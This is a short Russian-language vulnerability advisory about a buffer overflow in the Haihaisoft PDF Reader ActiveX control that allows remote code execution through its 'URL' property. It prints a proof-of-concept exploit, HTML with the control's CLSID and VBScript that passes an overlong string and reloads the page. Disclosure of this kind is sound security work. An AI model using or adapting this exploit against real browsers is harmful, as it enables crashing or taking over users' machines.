Программа:
Haihaisoft PDF Reader 1.x
Haihaisoft PDF Reader ActiveX Control 1.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в
PDFReaderOCX.ocx при обработке свойства "URL". Атакующий может передать
специально сформированные данные, что приведет к выполнению произвольного кода.

Эксплоит:

<object classid='clsid:28CB49D6-E530-442B-A182-79F047C3AA1B' id='test'></object>

<script language="vbscript">
buff = "AAAAAAAAAAAAAAABBBB" + String(2011, "C")
test.URL = buff

Function tryMe()
document.location.reload
End Function

Sub Window_OnLoad
setTimeout "tryMe()",2000
End Sub
</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии